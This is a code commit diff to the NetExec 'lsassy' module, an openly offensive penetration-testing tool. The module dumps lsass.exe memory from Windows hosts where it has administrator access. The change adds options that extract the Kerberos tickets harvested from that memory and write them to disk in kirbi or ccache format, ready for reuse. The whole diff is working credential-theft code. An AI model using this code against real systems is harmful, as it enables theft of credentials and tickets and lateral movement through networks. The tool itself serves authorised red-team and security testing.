added support for dumping kerberos tickets

gatariee · gatariee · commit 5566578dafc2 · 2025-07-31T07:32:09.000-04:00
diff --git a/nxc/modules/lsassy.py b/nxc/modules/lsassy.py
@@ -4,13 +4,16 @@
 #  https://beta.hackndo.com [FR]
 #  https://en.hackndo.com [EN]
 
+import os
+import sys
 from lsassy.dumper import Dumper
 from lsassy.impacketfile import ImpacketFile
 from lsassy.parser import Parser
 from lsassy.session import Session
 
-from nxc.helpers.bloodhound import add_user_bh
+from impacket.krb5.ccache import CCache
 
+from nxc.helpers.bloodhound import add_user_bh
 
 class NXCModule:
     name = "lsassy"
@@ -21,13 +24,32 @@ def __init__(self, context=None, module_options=None):
         self.context = context
         self.module_options = module_options
         self.method = None
+        self.dump_tickets = False
+        self.save_dir = None
+        self.ticket_type = "kirbi"
 
     def options(self, context, module_options):
-        """METHOD              Method to use to dump lsass.exe with lsassy"""
         self.method = "comsvcs"
         if "METHOD" in module_options:
             self.method = module_options["METHOD"]
 
+        if "DUMP_TICKETS" in module_options or "SAVE_DIR" in module_options:
+            if "DUMP_TICKETS" in module_options and "SAVE_DIR" in module_options:
+                self.dump_tickets = True
+                self.save_dir = module_options["SAVE_DIR"]
+            elif "DUMP_TICKETS" in module_options:
+                context.log.error("DUMP_TICKETS is set but SAVE_DIR is not specified. Both must be set to enable ticket dumping.")
+                sys.exit(1)
+            else:
+                context.log.error("SAVE_DIR is set but DUMP_TICKETS is not specified. Both must be set to enable ticket dumping.")
+                sys.exit(1)
+
+        if "SAVE_TYPE" in module_options:
+            self.ticket_type = module_options["SAVE_TYPE"]
+            if self.ticket_type not in ["kirbi", "ccache"]:
+                context.log.error(f"Invalid SAVE_TYPE '{self.ticket_type}'. Supported types are 'kirbi' and 'ccache'.")
+                sys.exit(1)
+
     def on_admin_login(self, context, connection):
         host = connection.host
         domain_name = connection.domain
@@ -67,7 +89,6 @@ def on_admin_login(self, context, connection):
             context.log.fail("Unable to parse lsass dump")
             return False
         credentials, tickets, masterkeys = parsed
-
         file.close()
         context.log.debug("Closed dumper file")
         file_path = file.get_file_path()
@@ -84,6 +105,9 @@ def on_admin_login(self, context, connection):
         if credentials is None:
             credentials = []
 
+        if self.dump_tickets and tickets:
+            self.write_tickets(context, tickets, host)
+
         for cred in credentials:
             c = cred.get_object()
             context.log.debug(f"Cred: {c}")
@@ -116,6 +140,52 @@ def on_admin_login(self, context, connection):
         context.log.debug("Calling process_credentials")
         self.process_credentials(context, connection, credentials_output)
 
+    def write_tickets(self, context, tickets, host):
+        if not tickets:
+            context.log.display("No Kerberos tickets found")
+            return
+
+        if not os.path.exists(self.save_dir):
+            try:
+                os.makedirs(self.save_dir)
+                context.log.debug(f"Created directory: {self.save_dir} for saving tickets")
+            except Exception as e:
+                context.log.fail(f"Error creating directory {self.save_dir}: {e}")
+                return
+
+        ticket_count = 0
+        for ticket in tickets:
+            for filename in ticket.kirbi_data:
+                try:
+                    base_filename = filename.split(".kirbi")[0]
+                    timestamp = ticket.EndTime.strftime("%Y%m%d%H%M%S")
+                    kirbi_data = ticket.kirbi_data[filename]
+
+                    if self.ticket_type == "ccache":
+                        ccache = CCache()
+                        ccache.fromKRBCRED(kirbi_data.dump())
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.ccache"
+                        ticket_content = ccache.getData()
+                    else:
+                        ticket_filename = f"{base_filename}_{host}_{timestamp}.kirbi"
+                        ticket_content = kirbi_data.dump()
+
+                    ticket_path = os.path.join(self.save_dir, ticket_filename)
+
+                    with open(ticket_path, "wb") as f:
+                        f.write(ticket_content)
+
+                    ticket_count += 1
+                    context.log.debug(f"Saved ticket: {ticket_filename}")
+
+                except Exception as e:
+                    context.log.fail(f"Error writing ticket {filename}: {e}")
+
+        if ticket_count > 0:
+            context.log.highlight(f"Saved {ticket_count} Kerberos ticket(s) to {self.save_dir}")
+        else:
+            context.log.display("No tickets were saved")
+
     def process_credentials(self, context, connection, credentials):
         if len(credentials) == 0:
             context.log.display("No credentials found")
@@ -162,4 +232,4 @@ def save_credentials(context, connection, domain, username, password, lmhash, nt
         else:
             credential_type = "hash"
             password = ":".join(h for h in [lmhash, nthash] if h is not None)
-        context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
+        context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
